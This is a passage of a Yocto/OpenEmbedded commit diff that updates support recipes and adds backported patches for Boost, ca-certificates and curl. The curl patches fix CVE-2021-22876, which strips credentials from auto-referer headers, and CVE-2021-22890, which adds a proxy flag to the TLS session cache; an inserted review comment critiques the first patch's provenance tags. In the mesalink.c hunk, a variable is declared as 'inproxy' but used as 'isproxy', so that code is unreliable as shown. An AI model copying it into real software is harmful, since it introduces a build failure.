+++ b/meta/recipes-support/attr/attr.inc
@@ -1,8 +1,6 @@
1SUMMARY = "Utilities for manipulating filesystem extended attributes" 1SUMMARY = "Utilities for manipulating filesystem extended attributes"
2DESCRIPTION = "A set of tools for manipulating extended attributes on filesystem \ 2DESCRIPTION = "Implement the ability for a user to attach name:value pairs to objects within the XFS filesystem."
3objects, in particular getfattr(1) and setfattr(1). An attr(1) command \ 3
4is also provided which is largely compatible with the SGI IRIX tool of \
5the same name."
6HOMEPAGE = "http://savannah.nongnu.org/projects/attr/" 4HOMEPAGE = "http://savannah.nongnu.org/projects/attr/"
7SECTION = "libs" 5SECTION = "libs"
8 6
diff --git a/meta/recipes-support/bash-completion/bash-completion_2.10.bb b/meta/recipes-support/bash-completion/bash-completion_2.10.bb
index 58e565dee5..1f99bf7386 100644
--- a/meta/recipes-support/bash-completion/bash-completion_2.10.bb
+++ b/meta/recipes-support/bash-completion/bash-completion_2.10.bb
@@ -1,6 +1,9 @@
1SUMMARY = "Programmable Completion for Bash 4" 1SUMMARY = "Programmable Completion for Bash 4"
2DESCRIPTION = "bash completion extends bash's standard completion behavior to \ 2DESCRIPTION = "Collection of command line command completions for the Bash shell, \
3achieve complex command lines with just a few keystrokes." 3collection of helper functions to assist in creating new completions, \
4and set of facilities for loading completions automatically on demand, as well \
5as installing them."
6
4HOMEPAGE = "https://github.com/scop/bash-completion" 7HOMEPAGE = "https://github.com/scop/bash-completion"
5BUGTRACKER = "https://github.com/scop/bash-completion/issues" 8BUGTRACKER = "https://github.com/scop/bash-completion/issues"
6 9
diff --git a/meta/recipes-support/bmap-tools/bmap-tools_3.5.bb b/meta/recipes-support/bmap-tools/bmap-tools_3.5.bb
index 986f0124e2..6a93cacc18 100644
--- a/meta/recipes-support/bmap-tools/bmap-tools_3.5.bb
+++ b/meta/recipes-support/bmap-tools/bmap-tools_3.5.bb
@@ -9,7 +9,7 @@ SECTION = "console/utils"
9LICENSE = "GPLv2" 9LICENSE = "GPLv2"
10LIC_FILES_CHKSUM = "file://COPYING;md5=b234ee4d69f5fce4486a80fdaf4a4263" 10LIC_FILES_CHKSUM = "file://COPYING;md5=b234ee4d69f5fce4486a80fdaf4a4263"
11 11
12SRC_URI = "git://github.com/intel/${BPN}" 12SRC_URI = "git://github.com/intel/${BPN};branch=main;protocol=https"
13 13
14SRCREV = "db7087b883bf52cbff063ad17a41cc1cbb85104d" 14SRCREV = "db7087b883bf52cbff063ad17a41cc1cbb85104d"
15S = "${WORKDIR}/git" 15S = "${WORKDIR}/git"
diff --git a/meta/recipes-support/boost/boost-1.72.0.inc b/meta/recipes-support/boost/boost-1.72.0.inc
index 55a095bf1c..d152895f09 100644
--- a/meta/recipes-support/boost/boost-1.72.0.inc
+++ b/meta/recipes-support/boost/boost-1.72.0.inc
@@ -11,7 +11,7 @@ BOOST_VER = "${@"_".join(d.getVar("PV").split("."))}"
11BOOST_MAJ = "${@"_".join(d.getVar("PV").split(".")[0:2])}" 11BOOST_MAJ = "${@"_".join(d.getVar("PV").split(".")[0:2])}"
12BOOST_P = "boost_${BOOST_VER}" 12BOOST_P = "boost_${BOOST_VER}"
13 13
14SRC_URI = "https://dl.bintray.com/boostorg/release/${PV}/source/${BOOST_P}.tar.bz2" 14SRC_URI = "https://boostorg.jfrog.io/artifactory/main/release/${PV}/source/${BOOST_P}.tar.bz2"
15SRC_URI[md5sum] = "cb40943d2a2cb8ce08d42bc48b0f84f0" 15SRC_URI[md5sum] = "cb40943d2a2cb8ce08d42bc48b0f84f0"
16SRC_URI[sha256sum] = "59c9b274bc451cf91a9ba1dd2c7fdcaf5d60b1b3aa83f2c9fa143417cc660722" 16SRC_URI[sha256sum] = "59c9b274bc451cf91a9ba1dd2c7fdcaf5d60b1b3aa83f2c9fa143417cc660722"
17 17
diff --git a/meta/recipes-support/boost/boost.inc b/meta/recipes-support/boost/boost.inc
index 8eb9494381..1c13fb3599 100644
--- a/meta/recipes-support/boost/boost.inc
+++ b/meta/recipes-support/boost/boost.inc
@@ -1,4 +1,8 @@
1SUMMARY = "Free peer-reviewed portable C++ source libraries" 1SUMMARY = "Free peer-reviewed portable C++ source libraries"
2DESCRIPTION = "Provides free peer-reviewed portable C++ source libraries. The emphasis is on libraries which work well with the C++ \
3Standard Library. One goal is to establish 'existing practice' and \
4provide reference implementations so that the Boost libraries are suitable for eventual standardization. Some of the libraries have already been proposed for inclusion in the C++ Standards Committee's \
5upcoming C++ Standard Library Technical Report."
2SECTION = "libs" 6SECTION = "libs"
3DEPENDS = "bjam-native zlib bzip2" 7DEPENDS = "bjam-native zlib bzip2"
4 8
@@ -161,7 +165,7 @@ do_configure() {
161 165
162 # D2194:Fixing the failure of "error: duplicate initialization of gcc with the following parameters" during compilation. 166 # D2194:Fixing the failure of "error: duplicate initialization of gcc with the following parameters" during compilation.
163 rm -f ${WORKDIR}/user-config.jam 167 rm -f ${WORKDIR}/user-config.jam
164 echo 'using gcc : 4.3.1 : ${CXX} : <cflags>"${CFLAGS}" <cxxflags>"${CXXFLAGS}" <linkflags>"${LDFLAGS}" ;' >> ${WORKDIR}/user-config.jam 168 echo 'using gcc : : ${CXX} : <cflags>"${CFLAGS}" <cxxflags>"${CXXFLAGS}" <linkflags>"${LDFLAGS}" ;' >> ${WORKDIR}/user-config.jam
165 169
166 # If we want Python then we need to tell Boost *exactly* where to find it 170 # If we want Python then we need to tell Boost *exactly* where to find it
167 if ${@bb.utils.contains('BOOST_LIBS', 'python', 'true', 'false', d)}; then 171 if ${@bb.utils.contains('BOOST_LIBS', 'python', 'true', 'false', d)}; then
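diff --git a/meta/recipes-support/boost/boost/0001-Fix-Wsign-compare-warning-with-glibc-2.34-on-Linux-p.patch b/meta/recipes-support/boost/boost/0001-Fix-Wsign-compare-warning-with-glibc-2.34-on-Linux-p.patch
new file mode 100644
index 0000000000..46c706931b
--- /dev/null
+++ b/meta/recipes-support/boost/boost/0001-Fix-Wsign-compare-warning-with-glibc-2.34-on-Linux-p.patch
@@ -0,0 +1,32 @@
+From f9d0e594d43afcb4ab0043117249feb266ba4515 Mon Sep 17 00:00:00 2001
+From: Romain Geissler <romain.geissler@amadeus.com>
+Date: Tue, 10 Aug 2021 14:22:28 +0000
+Subject: [PATCH] Fix -Wsign-compare warning with glibc 2.34 on Linux
+ platforms.
+
+In file included from /data/mwrep/res/osp/Boost/21-0-0-0/include/boost/thread/thread_only.hpp:17,
+ from /data/mwrep/res/osp/Boost/21-0-0-0/include/boost/thread/thread.hpp:12,
+ from src/GetTest.cpp:12:
+/data/mwrep/res/osp/Boost/21-0-0-0/include/boost/thread/pthread/thread_data.hpp: In member function 'void boost::thread_attributes::set_stack_size(std::size_t)':
+/data/mwrep/res/osp/Boost/21-0-0-0/include/boost/thread/pthread/thread_data.hpp:61:19: error: comparison of integer expressions of different signedness: 'std::size_t' {aka 'long unsigned int'} and 'long int' [-Werror=sign-compare]
+ 61 | if (size<PTHREAD_STACK_MIN) size=PTHREAD_STACK_MIN;
+ | ^
+
+Upstream-Status: Backport [1.78.0 https://github.com/boostorg/thread/commit/f9d0e594d43afcb4ab0043117249feb266ba4515]
+---
+ boost/thread/pthread/thread_data.hpp | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/boost/thread/pthread/thread_data.hpp b/boost/thread/pthread/thread_data.hpp
+index bc9b1367..c43b276d 100644
+--- a/boost/thread/pthread/thread_data.hpp
++++ b/boost/thread/pthread/thread_data.hpp
+@@ -58,7 +58,7 @@ namespace boost
+ std::size_t page_size = ::sysconf( _SC_PAGESIZE);
+ #endif
+ #ifdef PTHREAD_STACK_MIN
+- if (size<PTHREAD_STACK_MIN) size=PTHREAD_STACK_MIN;
++ if (size<static_cast<std::size_t>(PTHREAD_STACK_MIN)) size=PTHREAD_STACK_MIN;
+ #endif
+ size = ((size+page_size-1)/page_size)*page_size;
+ int res = pthread_attr_setstacksize(&val_, size);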
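diff --git a/meta/recipes-support/boost/boost/0001-Revert-change-to-elide-a-warning-that-caused-Solaris.patch b/meta/recipes-support/boost/boost/0001-Revert-change-to-elide-a-warning-that-caused-Solaris.patch
new file mode 100644
index 0000000000..3784cf9165
--- /dev/null
+++ b/meta/recipes-support/boost/boost/0001-Revert-change-to-elide-a-warning-that-caused-Solaris.patch
@@ -0,0 +1,24 @@
+From 74fb0a26099bc51d717f5f154b37231ce7df3e98 Mon Sep 17 00:00:00 2001
+From: Rob Boehne <robb@datalogics.com>
+Date: Wed, 20 Nov 2019 11:25:20 -0600
+Subject: [PATCH] Revert change to elide a warning that caused Solaris builds
+ to fail.
+
+Upstream-Status: Backport [1.73.0 https://github.com/boostorg/thread/commit/74fb0a26099bc51d717f5f154b37231ce7df3e98]
+---
+ boost/thread/pthread/thread_data.hpp | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/boost/thread/pthread/thread_data.hpp b/boost/thread/pthread/thread_data.hpp
+index aefbeb43..bc9b1367 100644
+--- a/boost/thread/pthread/thread_data.hpp
++++ b/boost/thread/pthread/thread_data.hpp
+@@ -57,7 +57,7 @@ namespace boost
+ #else
+ std::size_t page_size = ::sysconf( _SC_PAGESIZE);
+ #endif
+-#if PTHREAD_STACK_MIN > 0
++#ifdef PTHREAD_STACK_MIN
+ if (size<PTHREAD_STACK_MIN) size=PTHREAD_STACK_MIN;
+ #endif
+ size = ((size+page_size-1)/page_size)*page_size;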
diff --git a/meta/recipes-support/boost/boost_1.72.0.bb b/meta/recipes-support/boost/boost_1.72.0.bb
index df1cc16937..b3ec11933c 100644
--- a/meta/recipes-support/boost/boost_1.72.0.bb
+++ b/meta/recipes-support/boost/boost_1.72.0.bb
@@ -9,4 +9,6 @@ SRC_URI += " \
9 file://0001-dont-setup-compiler-flags-m32-m64.patch \ 9 file://0001-dont-setup-compiler-flags-m32-m64.patch \
10 file://0001-revert-cease-dependence-on-range.patch \ 10 file://0001-revert-cease-dependence-on-range.patch \
11 file://0001-added-typedef-executor_type.patch \ 11 file://0001-added-typedef-executor_type.patch \
12 file://0001-Revert-change-to-elide-a-warning-that-caused-Solaris.patch \
13 file://0001-Fix-Wsign-compare-warning-with-glibc-2.34-on-Linux-p.patch \
12 " 14 "
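diff --git a/meta/recipes-support/ca-certificates/ca-certificates/0001-Revert-mozilla-certdata2pem.py-print-a-warning-for-e.patch b/meta/recipes-support/ca-certificates/ca-certificates/0001-Revert-mozilla-certdata2pem.py-print-a-warning-for-e.patch
new file mode 100644
index 0000000000..5c4a32f526
--- /dev/null
+++ b/meta/recipes-support/ca-certificates/ca-certificates/0001-Revert-mozilla-certdata2pem.py-print-a-warning-for-e.patch
@@ -0,0 +1,80 @@
+From cb43ec15b700b25f3c4fe44043a1a021aaf5b768 Mon Sep 17 00:00:00 2001
+From: Alexander Kanavin <alex@linutronix.de>
+Date: Mon, 18 Oct 2021 12:05:49 +0200
+Subject: [PATCH] Revert "mozilla/certdata2pem.py: print a warning for expired
+ certificates."
+
+This avoids a dependency on python3-cryptography, and only checks
+for expired certs (which is upstream concern, but not ours).
+
+Upstream-Status: Inappropriate [oe-core specific]
+Signed-off-by: Alexander Kanavin <alex@linutronix.de>
+---
+ debian/changelog | 1 -
+ debian/control | 2 +-
+ mozilla/certdata2pem.py | 11 -----------
+ 3 files changed, 1 insertion(+), 13 deletions(-)
+
+diff --git a/debian/changelog b/debian/changelog
+index 531e4d0..4006509 100644
+--- a/debian/changelog
++++ b/debian/changelog
+@@ -37,7 +37,6 @@ ca-certificates (20211004) unstable; urgency=low
+ - "Trustis FPS Root CA"
+ - "Staat der Nederlanden Root CA - G3"
+ * Blacklist expired root certificate "DST Root CA X3" (closes: #995432)
+- * mozilla/certdata2pem.py: print a warning for expired certificates.
+
+ -- Julien Cristau <jcristau@debian.org> Thu, 07 Oct 2021 17:12:47 +0200
+
+diff --git a/debian/control b/debian/control
+index 4434b7a..5c6ba24 100644
+--- a/debian/control
++++ b/debian/control
+@@ -3,7 +3,7 @@ Section: misc
+ Priority: optional
+ Maintainer: Julien Cristau <jcristau@debian.org>
+ Build-Depends: debhelper-compat (= 13), po-debconf
+-Build-Depends-Indep: python3, openssl, python3-cryptography
++Build-Depends-Indep: python3, openssl
+ Standards-Version: 4.5.0.2
+ Vcs-Git: https://salsa.debian.org/debian/ca-certificates.git
+ Vcs-Browser: https://salsa.debian.org/debian/ca-certificates
+diff --git a/mozilla/certdata2pem.py b/mozilla/certdata2pem.py
+index ede23d4..7d796f1 100644
+--- a/mozilla/certdata2pem.py
++++ b/mozilla/certdata2pem.py
+@@ -21,16 +21,12 @@
+ # USA.
+
+ import base64
+-import datetime
+ import os.path
+ import re
+ import sys
+ import textwrap
+ import io
+
+-from cryptography import x509
+-
+-
+ objects = []
+
+ # Dirty file parser.
+@@ -121,13 +117,6 @@ for obj in objects:
+ if obj['CKA_CLASS'] == 'CKO_CERTIFICATE':
+ if not obj['CKA_LABEL'] in trust or not trust[obj['CKA_LABEL']]:
+ continue
+-
+- cert = x509.load_der_x509_certificate(obj['CKA_VALUE'])
+- if cert.not_valid_after < datetime.datetime.now():
+- print('!'*74)
+- print('Trusted but expired certificate found: %s' % obj['CKA_LABEL'])
+- print('!'*74)
+-
+ bname = obj['CKA_LABEL'][1:-1].replace('/', '_')\
+ .replace(' ', '_')\
+ .replace('(', '=')\
+--
+2.20.1
+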
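diff --git a/meta/recipes-support/ca-certificates/ca-certificates/sbindir.patch b/meta/recipes-support/ca-certificates/ca-certificates/sbindir.patch
deleted file mode 100644
index a113fa8b15..0000000000
--- a/meta/recipes-support/ca-certificates/ca-certificates/sbindir.patch
+++ /dev/null
@@ -1,20 +0,0 @@
-Upstream-Status: Pending
-
-Let us alter the install destination of the script via SBINDIR
-
---- ca-certificates-20130119.orig/sbin/Makefile
-+++ ca-certificates-20130119/sbin/Makefile
-@@ -3,9 +3,12 @@
- #
- #
-
-+SBINDIR = /usr/sbin
-+
- all:
-
- clean:
-
- install:
-- install -m755 update-ca-certificates $(DESTDIR)/usr/sbin/
-+ install -d $(DESTDIR)$(SBINDIR)
-+ install -m755 update-ca-certificates $(DESTDIR)$(SBINDIR)/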
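diff --git a/meta/recipes-support/ca-certificates/ca-certificates/update-ca-certificates-support-Toybox.patch b/meta/recipes-support/ca-certificates/ca-certificates/update-ca-certificates-support-Toybox.patch
deleted file mode 100644
index 6e2171f758..0000000000
--- a/meta/recipes-support/ca-certificates/ca-certificates/update-ca-certificates-support-Toybox.patch
+++ /dev/null
@@ -1,34 +0,0 @@
-From 30378026d136efa779732e3f6664e2ecf461e458 Mon Sep 17 00:00:00 2001
-From: Patrick Ohly <patrick.ohly@intel.com>
-Date: Thu, 17 Mar 2016 12:38:09 +0100
-Subject: [PATCH] update-ca-certificates: support Toybox
-
-"mktemp -t" is deprecated and does not work when using Toybox. Replace
-with something that works also with Toybox.
-
-Upstream-Status: Pending
-
-Signed-off-by: Patrick Ohly <patrick.ohly@intel.com>
----
- sbin/update-ca-certificates | 6 +++---
- 1 file changed, 3 insertions(+), 3 deletions(-)
-
-diff --git a/sbin/update-ca-certificates b/sbin/update-ca-certificates
-index 79c41bb..ae9e3f1 100755
---- a/sbin/update-ca-certificates
-+++ b/sbin/update-ca-certificates
-@@ -113,9 +113,9 @@ trap cleanup 0
-
- # Helper files. (Some of them are not simple arrays because we spawn
- # subshells later on.)
--TEMPBUNDLE="$(mktemp -t "${CERTBUNDLE}.tmp.XXXXXX")"
--ADDED="$(mktemp -t "ca-certificates.tmp.XXXXXX")"
--REMOVED="$(mktemp -t "ca-certificates.tmp.XXXXXX")"
-+TEMPBUNDLE="$(mktemp -p${TMPDIR:-/tmp} "${CERTBUNDLE}.tmp.XXXXXX")"
-+ADDED="$(mktemp -p${TMPDIR:-/tmp} "ca-certificates.tmp.XXXXXX")"
-+REMOVED="$(mktemp -p${TMPDIR:-/tmp} "ca-certificates.tmp.XXXXXX")"
-
- # Adds a certificate to the list of trusted ones. This includes a symlink
- # in /etc/ssl/certs to the certificate file and its inclusion into the
---
-2.1.4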
diff --git a/meta/recipes-support/ca-certificates/ca-certificates_20210119.bb b/meta/recipes-support/ca-certificates/ca-certificates_20211016.bb
index 888a235c1a..a54d6b458a 100644
--- a/meta/recipes-support/ca-certificates/ca-certificates_20210119.bb
+++ b/meta/recipes-support/ca-certificates/ca-certificates_20211016.bb
@@ -14,15 +14,14 @@ DEPENDS_class-nativesdk = "openssl-native"
14# Need rehash from openssl and run-parts from debianutils 14# Need rehash from openssl and run-parts from debianutils
15PACKAGE_WRITE_DEPS += "openssl-native debianutils-native" 15PACKAGE_WRITE_DEPS += "openssl-native debianutils-native"
16 16
17SRCREV = "181be7ebd169b4a6fb5d90c3e6dc791e90534144" 17SRCREV = "07de54fdcc5806bde549e1edf60738c6bccf50e8"
18 18
19SRC_URI = "git://salsa.debian.org/debian/ca-certificates.git;protocol=https \ 19SRC_URI = "git://salsa.debian.org/debian/ca-certificates.git;protocol=https;branch=master \
20 file://0002-update-ca-certificates-use-SYSROOT.patch \ 20 file://0002-update-ca-certificates-use-SYSROOT.patch \
21 file://0001-update-ca-certificates-don-t-use-Debianisms-in-run-p.patch \ 21 file://0001-update-ca-certificates-don-t-use-Debianisms-in-run-p.patch \
22 file://update-ca-certificates-support-Toybox.patch \
23 file://default-sysroot.patch \ 22 file://default-sysroot.patch \
24 file://sbindir.patch \
25 file://0003-update-ca-certificates-use-relative-symlinks-from-ET.patch \ 23 file://0003-update-ca-certificates-use-relative-symlinks-from-ET.patch \
24 file://0001-Revert-mozilla-certdata2pem.py-print-a-warning-for-e.patch \
26 " 25 "
27UPSTREAM_CHECK_GITTAGREGEX = "(?P<pver>\d+)" 26UPSTREAM_CHECK_GITTAGREGEX = "(?P<pver>\d+)"
28 27
@@ -83,8 +82,8 @@ do_install_append_class-native () {
83 SYSROOT="${D}${base_prefix}" ${D}${sbindir}/update-ca-certificates 82 SYSROOT="${D}${base_prefix}" ${D}${sbindir}/update-ca-certificates
84} 83}
85 84
86RDEPENDS_${PN}_class-target = "openssl-bin" 85RDEPENDS_${PN}_append_class-target = " openssl-bin openssl"
87RDEPENDS_${PN}_class-native = "openssl-native" 86RDEPENDS_${PN}_append_class-native = " openssl-native"
88RDEPENDS_${PN}_class-nativesdk = "nativesdk-openssl-bin" 87RDEPENDS_${PN}_append_class-nativesdk = " nativesdk-openssl-bin nativesdk-openssl"
89 88
90BBCLASSEXTEND = "native nativesdk" 89BBCLASSEXTEND = "native nativesdk"
diff --git a/meta/recipes-support/consolekit/consolekit_0.4.6.bb b/meta/recipes-support/consolekit/consolekit_0.4.6.bb
index 89f2d77b66..22e755747b 100644
--- a/meta/recipes-support/consolekit/consolekit_0.4.6.bb
+++ b/meta/recipes-support/consolekit/consolekit_0.4.6.bb
@@ -1,4 +1,6 @@
1SUMMARY = "Framework for defining and tracking users, login sessions, and seats" 1SUMMARY = "Framework for defining and tracking users, login sessions, and seats"
2DESCRIPTION = "It provides a mechanism for software to react to changes \
3of any of these items or of any of the metadata associated with them."
2HOMEPAGE = "http://www.freedesktop.org/wiki/Software/ConsoleKit" 4HOMEPAGE = "http://www.freedesktop.org/wiki/Software/ConsoleKit"
3BUGTRACKER = "https://bugs.freedesktop.org/buglist.cgi?query_format=specific&product=ConsoleKit" 5BUGTRACKER = "https://bugs.freedesktop.org/buglist.cgi?query_format=specific&product=ConsoleKit"
4 6
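diff --git a/meta/recipes-support/curl/curl/CVE-2021-22876.patch b/meta/recipes-support/curl/curl/CVE-2021-22876.patch
new file mode 100644
index 0000000000..fc396aabef
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2021-22876.patch
@@ -0,0 +1,59 @@
+transfer: strip credentials from the auto-referer header field
+
+CVE-2021-22876
+
+Patch taken from Ubuntu curl 7.68.0-1ubuntu2.5.
+
+Bug: https://curl.se/docs/CVE-2021-22876.html
+Upstream-Status: backport
+---
+ lib/transfer.c | 25 +++++++++++++++++++++++--
+ 1 file changed, 23 insertions(+), 2 deletions(-)
+
+diff --git a/lib/transfer.c b/lib/transfer.c
+index e76834eb3..744e1c00b 100644
+--- a/lib/transfer.c
++++ b/lib/transfer.c
+@@ -1570,6 +1570,9 @@ CURLcode Curl_follow(struct Curl_easy *data,
+ data->set.followlocation++; /* count location-followers */
+
+ if(data->set.http_auto_referer) {
++ CURLU *u;
++ char *referer;
++
+ /* We are asked to automatically set the previous URL as the referer
+ when we get the next URL. We pick the ->url field, which may or may
+ not be 100% correct */
+@@ -1579,9 +1582,27 @@ CURLcode Curl_follow(struct Curl_easy *data,
+ data->change.referer_alloc = FALSE;
+ }
+
+- data->change.referer = strdup(data->change.url);
+- if(!data->change.referer)
++ /* Make a copy of the URL without crenditals and fragment */
++ u = curl_url();
++ if(!u)
++ return CURLE_OUT_OF_MEMORY;
++
++ uc = curl_url_set(u, CURLUPART_URL, data->change.url, 0);
++ if(!uc)
++ uc = curl_url_set(u, CURLUPART_FRAGMENT, NULL, 0);
++ if(!uc)
++ uc = curl_url_set(u, CURLUPART_USER, NULL, 0);
++ if(!uc)
++ uc = curl_url_set(u, CURLUPART_PASSWORD, NULL, 0);
++ if(!uc)
++ uc = curl_url_get(u, CURLUPART_URL, &referer, 0);
++
++ curl_url_cleanup(u);
++
++ if(uc || referer == NULL)
+ return CURLE_OUT_OF_MEMORY;
++
++ data->change.referer = referer;
+ data->change.referer_alloc = TRUE; /* yes, free this later */
+ }
+ }
+--
+2.20.1
+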
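Review bot: The header of this backport lacks the provenance tags that the aspell CVE patch in the same commit carries: there is no `CVE:` line, no `Signed-off-by:`, and `Upstream-Status: backport` is lowercase with no upstream commit reference (only "taken from Ubuntu"). I would add `CVE: CVE-2021-22876`, `Upstream-Status: Backport [<upstream curl commit URL>]` and `Signed-off-by: <backporter>` so the fix can be traced and audited against upstream. In the code, `uc` is assigned in the added lines but its declaration is in neither hunk, so it presumably already exists earlier in `Curl_follow`; worth confirming against the curl version this recipe builds. Every `curl_url_set()`/`curl_url_get()` failure is also returned as `CURLE_OUT_OF_MEMORY`, which will mislabel a URL that merely fails to parse.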
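--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2021-22890.patch
@@ -0,0 +1,464 @@
+vtls: add 'isproxy' argument to Curl_ssl_get/addsessionid()
+
+To make sure we set and extract the correct session.
+
+Patch taken from Ubuntu curl 7.68.0-1ubuntu2.5.
+
+CVE-2021-22890
+
+Reported-by: Mingtao Yang
+Bug: https://curl.se/docs/CVE-2021-22890.html
+Upstream-Status: backport
+---
+ lib/vtls/bearssl.c | 9 +++++---
+ lib/vtls/gtls.c | 9 +++++---
+ lib/vtls/mbedtls.c | 8 ++++---
+ lib/vtls/mesalink.c | 9 +++++---
+ lib/vtls/openssl.c | 52 ++++++++++++++++++++++++++++++++++----------
+ lib/vtls/schannel.c | 10 +++++----
+ lib/vtls/sectransp.c | 9 ++++----
+ lib/vtls/vtls.c | 9 ++++++--
+ lib/vtls/vtls.h | 2 ++
+ lib/vtls/wolfssl.c | 8 ++++---
+ 10 files changed, 88 insertions(+), 37 deletions(-)
+
+diff --git a/lib/vtls/bearssl.c b/lib/vtls/bearssl.c
+index 67f945831..32cb0a4c2 100644
+--- a/lib/vtls/bearssl.c
++++ b/lib/vtls/bearssl.c
+@@ -372,7 +372,8 @@ static CURLcode bearssl_connect_step1(struct connectdata *conn, int sockindex)
+ void *session;
+
+ Curl_ssl_sessionid_lock(conn);
+- if(!Curl_ssl_getsessionid(conn, &session, NULL, sockindex)) {
++ if(!Curl_ssl_getsessionid(conn, SSL_IS_PROXY() ? TRUE : FALSE,
++ &session, NULL, sockindex)) {
+ br_ssl_engine_set_session_parameters(&BACKEND->ctx.eng, session);
+ infof(data, "BearSSL: re-using session ID\n");
+ }
+@@ -560,10 +561,12 @@ static CURLcode bearssl_connect_step3(struct connectdata *conn, int sockindex)
+ return CURLE_OUT_OF_MEMORY;
+ br_ssl_engine_get_session_parameters(&BACKEND->ctx.eng, session);
+ Curl_ssl_sessionid_lock(conn);
+- incache = !(Curl_ssl_getsessionid(conn, &oldsession, NULL, sockindex));
++ incache = !(Curl_ssl_getsessionid(conn, SSL_IS_PROXY() ? TRUE : FALSE,
++ &oldsession, NULL, sockindex));
+ if(incache)
+ Curl_ssl_delsessionid(conn, oldsession);
+- ret = Curl_ssl_addsessionid(conn, session, 0, sockindex);
++ ret = Curl_ssl_addsessionid(conn, SSL_IS_PROXY() ? TRUE : FALSE,
++ session, 0, sockindex);
+ Curl_ssl_sessionid_unlock(conn);
+ if(ret) {
+ free(session);
+diff --git a/lib/vtls/gtls.c b/lib/vtls/gtls.c
+index 5f740eeba..46e149c7d 100644
+--- a/lib/vtls/gtls.c
++++ b/lib/vtls/gtls.c
+@@ -937,7 +937,8 @@ gtls_connect_step1(struct connectdata *conn,
+ size_t ssl_idsize;
+
+ Curl_ssl_sessionid_lock(conn);
+- if(!Curl_ssl_getsessionid(conn, &ssl_sessionid, &ssl_idsize, sockindex)) {
++ if(!Curl_ssl_getsessionid(conn, SSL_IS_PROXY() ? TRUE : FALSE,
++ &ssl_sessionid, &ssl_idsize, sockindex)) {
+ /* we got a session id, use it! */
+ gnutls_session_set_data(session, ssl_sessionid, ssl_idsize);
+
+@@ -1485,7 +1486,8 @@ gtls_connect_step3(struct connectdata *conn,
+ gnutls_session_get_data(session, connect_sessionid, &connect_idsize);
+
+ Curl_ssl_sessionid_lock(conn);
+- incache = !(Curl_ssl_getsessionid(conn, &ssl_sessionid, NULL,
++ incache = !(Curl_ssl_getsessionid(conn, SSL_IS_PROXY() ? TRUE : FALSE,
++ &ssl_sessionid, NULL,
+ sockindex));
+ if(incache) {
+ /* there was one before in the cache, so instead of risking that the
+@@ -1494,7 +1496,8 @@ gtls_connect_step3(struct connectdata *conn,
+ }
+
+ /* store this session id */
+- result = Curl_ssl_addsessionid(conn, connect_sessionid, connect_idsize,
++ result = Curl_ssl_addsessionid(conn, SSL_IS_PROXY() ? TRUE : FALSE,
++ connect_sessionid, connect_idsize,
+ sockindex);
+ Curl_ssl_sessionid_unlock(conn);
+ if(result) {
+diff --git a/lib/vtls/mbedtls.c b/lib/vtls/mbedtls.c
+index f057315f3..19df8478e 100644
+--- a/lib/vtls/mbedtls.c
++++ b/lib/vtls/mbedtls.c
+@@ -453,7 +453,8 @@ mbed_connect_step1(struct connectdata *conn,
+ void *old_session = NULL;
+
+ Curl_ssl_sessionid_lock(conn);
+- if(!Curl_ssl_getsessionid(conn, &old_session, NULL, sockindex)) {
++ if(!Curl_ssl_getsessionid(conn, SSL_IS_PROXY() ? TRUE : FALSE,
++ &old_session, NULL, sockindex)) {
+ ret = mbedtls_ssl_set_session(&BACKEND->ssl, old_session);
+ if(ret) {
+ Curl_ssl_sessionid_unlock(conn);
+@@ -709,6 +710,7 @@ mbed_connect_step3(struct connectdata *conn,
+ int ret;
+ mbedtls_ssl_session *our_ssl_sessionid;
+ void *old_ssl_sessionid = NULL;
++ bool isproxy = SSL_IS_PROXY() ? TRUE : FALSE;
+
+ our_ssl_sessionid = malloc(sizeof(mbedtls_ssl_session));
+ if(!our_ssl_sessionid)
+@@ -727,10 +729,10 @@ mbed_connect_step3(struct connectdata *conn,
+
+ /* If there's already a matching session in the cache, delete it */
+ Curl_ssl_sessionid_lock(conn);
+- if(!Curl_ssl_getsessionid(conn, &old_ssl_sessionid, NULL, sockindex))
++ if(!Curl_ssl_getsessionid(conn, isproxy, &old_ssl_sessionid, NULL, sockindex))
+ Curl_ssl_delsessionid(conn, old_ssl_sessionid);
+
+- retcode = Curl_ssl_addsessionid(conn, our_ssl_sessionid, 0, sockindex);
++ retcode = Curl_ssl_addsessionid(conn, isproxy, our_ssl_sessionid, 0, sockindex);
+ Curl_ssl_sessionid_unlock(conn);
+ if(retcode) {
+ mbedtls_ssl_session_free(our_ssl_sessionid);
+diff --git a/lib/vtls/mesalink.c b/lib/vtls/mesalink.c
+index cab1e390b..79d1e3dfa 100644
+--- a/lib/vtls/mesalink.c
++++ b/lib/vtls/mesalink.c
+@@ -263,7 +263,8 @@ mesalink_connect_step1(struct connectdata *conn, int sockindex)
+ void *ssl_sessionid = NULL;
+
+ Curl_ssl_sessionid_lock(conn);
+- if(!Curl_ssl_getsessionid(conn, &ssl_sessionid, NULL, sockindex)) {
++ if(!Curl_ssl_getsessionid(conn, SSL_IS_PROXY() ? TRUE : FALSE,
++ &ssl_sessionid, NULL, sockindex)) {
+ /* we got a session id, use it! */
+ if(!SSL_set_session(BACKEND->handle, ssl_sessionid)) {
+ Curl_ssl_sessionid_unlock(conn);
+@@ -347,12 +348,14 @@ mesalink_connect_step3(struct connectdata *conn, int sockindex)
+ bool incache;
+ SSL_SESSION *our_ssl_sessionid;
+ void *old_ssl_sessionid = NULL;
++ bool inproxy = SSL_IS_PROXY() ? TRUE : FALSE;
+
+ our_ssl_sessionid = SSL_get_session(BACKEND->handle);
+
+ Curl_ssl_sessionid_lock(conn);
+ incache =
+- !(Curl_ssl_getsessionid(conn, &old_ssl_sessionid, NULL, sockindex));
++ !(Curl_ssl_getsessionid(conn, isproxy, &old_ssl_sessionid,
++ NULL, sockindex));
+ if(incache) {
+ if(old_ssl_sessionid != our_ssl_sessionid) {
+ infof(data, "old SSL session ID is stale, removing\n");
+@@ -363,7 +366,7 @@ mesalink_connect_step3(struct connectdata *conn, int sockindex)
+
+ if(!incache) {
+ result = Curl_ssl_addsessionid(
+- conn, our_ssl_sessionid, 0 /* unknown size */, sockindex);
++ conn, isproxy, our_ssl_sessionid, 0 /* unknown size */, sockindex);
+ if(result) {
+ Curl_ssl_sessionid_unlock(conn);
+ failf(data, "failed to store ssl session");
+diff --git a/lib/vtls/openssl.c b/lib/vtls/openssl.c
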